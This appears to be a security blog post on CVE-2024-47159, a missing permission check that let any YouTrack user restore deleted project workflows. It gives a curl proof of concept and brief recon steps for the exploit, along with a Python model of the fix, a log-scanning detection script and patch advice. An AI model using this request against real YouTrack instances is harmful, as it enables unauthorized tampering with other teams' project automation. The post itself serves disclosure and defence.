CVE-2024-47159 - How JetBrains YouTrack Workflow Restore Flaw Lets Unauthorized Users Meddle With Your Projects

> Summary: JetBrains YouTrack before version 2024.3.44799 contains a critical security flaw, CVE-2024-47159, where users without sufficient permissions could restore deleted workflows linked to projects. This post dives into how the vulnerability works, its real impact, exploitation details, and includes code snippets to demonstrate the flaw—all in plain American English.

What is JetBrains YouTrack?

JetBrains YouTrack is a popular issue tracking and project management tool used by teams worldwide. Its workflow feature allows you to automate complex business rules and manage project processes.

About CVE-2024-47159

- Vulnerability ID: CVE-2024-47159

Description

In affected YouTrack releases, any user — even without admin or project-level privileges — can restore ("undelete") workflows that were previously attached to a project. Workflows define business logic (like auto-assigning tasks or sending notifications), so restoring them can alter project behavior without proper oversight.

Why This Matters

Workflows can influence permissions, issue processing, and notifications. If an unauthorized team member can resurrect custom (or even malicious) workflows, the consequences range from disrupted ticket handling to bypassed rules and leaked information, as laid out under Impact below.

Buggy Behavior

Prior to version 2024.3.44799, the REST endpoint for restoring a workflow did not check user permissions correctly.

Any user could send an API call of this kind to bring a deleted workflow back to life:

```http
POST /api/admin/workflows/{workflowId}/restore
Authorization: Bearer <user-token>
Content-Type: application/json

{
    "projectId": "PROJECT_ABC"
}
```

Even if <user-token> belonged to a non-privileged user, YouTrack would restore the workflow if {workflowId} was valid and attached to the project.
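To make the gap concrete, here is a toy model of the restore operation in both its pre-fix and hardened forms. This is an added illustration, not YouTrack's own code: the `User`/`Workflow` classes, the per-project admin role (`admin_of`) and the in-memory `WorkflowStore` are assumptions chosen to mirror the behaviour described above, where the endpoint validated only that the workflow id and project id matched and never consulted the caller's permissions.

```python
"""Toy model of the missing authorization check behind CVE-2024-47159.

Added illustration, not YouTrack's own code: the classes, the per-project
admin role and the in-memory store are assumptions mirroring the description
above (any authenticated token was enough if the ids were valid).
"""
from dataclasses import dataclass, field


class PermissionDenied(Exception):
    """Raised when the caller lacks the right to administer the project."""


@dataclass
class User:
    name: str
    admin_of: set = field(default_factory=set)  # hypothetical role model


@dataclass
class Workflow:
    workflow_id: str
    project_id: str
    deleted: bool = True


class WorkflowStore:
    def __init__(self, workflows):
        self.workflows = {w.workflow_id: w for w in workflows}

    def _lookup(self, workflow_id, project_id):
        # Both variants validate the ids; that was never the problem.
        wf = self.workflows[workflow_id]
        if wf.project_id != project_id:
            raise KeyError("workflow is not attached to that project")
        return wf

    def restore_vulnerable(self, user, workflow_id, project_id):
        """Pre-2024.3.44799 behaviour as described: the caller's
        permissions are never checked, only the ids."""
        wf = self._lookup(workflow_id, project_id)
        wf.deleted = False
        return wf

    def restore_fixed(self, user, workflow_id, project_id):
        """Hardened variant: authorize against the *requested* project
        before touching any state, so a valid id alone is never enough."""
        if project_id not in user.admin_of:
            raise PermissionDenied(
                f"{user.name} may not restore workflows in {project_id}")
        wf = self._lookup(workflow_id, project_id)
        wf.deleted = False
        return wf


def demo():
    """Run both variants with a low-privilege and an admin caller."""
    lowpriv = User("lowpriv")                          # constructed sample users
    admin = User("admin", admin_of={"PROJECT_ABC"})
    results = {}

    store = WorkflowStore([Workflow("wf-1", "PROJECT_ABC")])
    store.restore_vulnerable(lowpriv, "wf-1", "PROJECT_ABC")
    results["vulnerable_lowpriv_restored"] = not store.workflows["wf-1"].deleted

    store = WorkflowStore([Workflow("wf-1", "PROJECT_ABC")])
    try:
        store.restore_fixed(lowpriv, "wf-1", "PROJECT_ABC")
        results["fixed_lowpriv_restored"] = True
    except PermissionDenied:
        results["fixed_lowpriv_restored"] = False
    results["fixed_lowpriv_state_untouched"] = store.workflows["wf-1"].deleted

    store.restore_fixed(admin, "wf-1", "PROJECT_ABC")
    results["fixed_admin_restored"] = not store.workflows["wf-1"].deleted
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the hardened variant is the ordering: the authorization decision is made against the project named in the request, before any lookup or state change, so neither a guessed workflow id nor a mismatched project id can reach the restore step.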

Proof-of-Concept (PoC) with curl

```bash
curl -X POST \
  "https://your-youtrack-instance.com/api/admin/workflows/<id>/restore" \
  -H "Authorization: Bearer <lowpriv-token>" \
  -H "Content-Type: application/json" \
  -d '{"projectId":"PROJECT_ABC"}'
```

Replace <lowpriv-token> with your user token.

If successful, you’ll see the workflow reappear attached to PROJECT_ABC — even if your user shouldn’t have the rights to do this.

Step-by-step

1. Recon: Attacker (a normal YouTrack user) lists all deleted workflows, possibly via /api/workflows?visibleForCollaborator=true.
2. Selection: Attacker notes the IDs of previously deleted workflows attached to important projects.

Impact: The project now follows potentially outdated, buggy, or malicious automation rules.

Example: An earlier workflow that closes issues automatically on creation gets restored, causing real headaches for ticket management.

- Disruption: Projects may start following obsolete or broken rules.

- Security risks: If an attacker restores a workflow with logic to escalate privileges or leak notifications, sensitive info can be exposed or rules bypassed.
- Hard to audit: Teams may not realize a rule’s been re-enabled, causing subtle long-term errors.
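Because a restored rule is easy to miss, the practical defensive step on an unpatched or recently patched instance is to look for restore calls in the access logs and review any that did not come from a project administrator. The script below is an added detection example, not from the original post or from JetBrains: it assumes YouTrack sits behind a reverse proxy writing combined-format access logs with the authenticated user in the third field, the log lines are constructed, and the admin list is a placeholder you would fill from your own project settings.

```python
"""Find calls to the workflow-restore endpoint in proxy access logs.

Added detection example, not part of the original post. Assumes a combined
log format with the authenticated user in the third field; the sample lines
and the admin list are constructed placeholders.
"""
import re

ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Path shape from the advisory: /api/admin/workflows/{workflowId}/restore
RESTORE_PATH = re.compile(
    r'^/api/admin/workflows/(?P<wid>[^/?]+)/restore(?:\?.*)?$')

# Constructed sample log; real user and workflow ids will differ.
SAMPLE_LOG = """\
10.0.0.5 - alice [19/Sep/2024:18:15:09 +0000] "POST /api/admin/workflows/wf-123/restore HTTP/1.1" 200 87
10.0.0.7 - bob [19/Sep/2024:18:16:30 +0000] "GET /api/issues?query=state:Open HTTP/1.1" 200 5120
10.0.0.9 - mallory [19/Sep/2024:18:17:02 +0000] "POST /api/admin/workflows/wf-777/restore HTTP/1.1" 200 87
10.0.0.9 - mallory [19/Sep/2024:18:17:05 +0000] "POST /api/admin/workflows/wf-778/restore HTTP/1.1" 403 42
"""


def find_workflow_restores(lines):
    """Return every POST to the restore endpoint, whatever its outcome."""
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        p = RESTORE_PATH.match(m["path"])
        if not p:
            continue
        findings.append({
            "user": m["user"],
            "workflow_id": p["wid"],
            "status": int(m["status"]),
            "ts": m["ts"],
        })
    return findings


def suspicious_restores(lines, known_admins):
    """Successful (2xx) restores by anyone not on the admin list.

    Before the fix the server accepted these, so the log is the only
    record that a rule was re-enabled without authorization."""
    return [f for f in find_workflow_restores(lines)
            if 200 <= f["status"] < 300 and f["user"] not in known_admins]


if __name__ == "__main__":
    admins = {"alice"}  # placeholder: load from your project settings
    for hit in suspicious_restores(SAMPLE_LOG.splitlines(), admins):
        print(f"REVIEW {hit['ts']} user={hit['user']} "
              f"workflow={hit['workflow_id']} status={hit['status']}")
```

Run it over the proxy log for the period before the upgrade; every hit is a workflow whose current state should be compared against the project's intended rules, since the restore itself leaves no other obvious trace.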

Patch ASAP: Upgrade to YouTrack 2024.3.44799 or newer.

- Official release notes: YouTrack Release Notes

More Info and References

- NVD CVE-2024-47159 Entry
- JetBrains YouTrack Announcement
- YouTrack Changelog

Summary Table

| Impact | API Access Needed | Attack Complexity | Authentication Required |
|----------------------|------------------|------------------|------------------------|
| Workflow tampering | Yes | Low | Yes (any user) |

Conclusion

CVE-2024-47159 is a simple but dangerous oversight. Even trusted environments sometimes trip over permission design, as this YouTrack bug shows. If you’re a YouTrack admin, upgrade today, review your workflow history and make sure only the right folks have the keys to your project logic.

*Stay secure, patch often, and don’t let old workflows haunt your projects!*

Timeline

Published on: 09/19/2024 18:15:09 UTC
Last modified on: 09/24/2024 18:09:50 UTC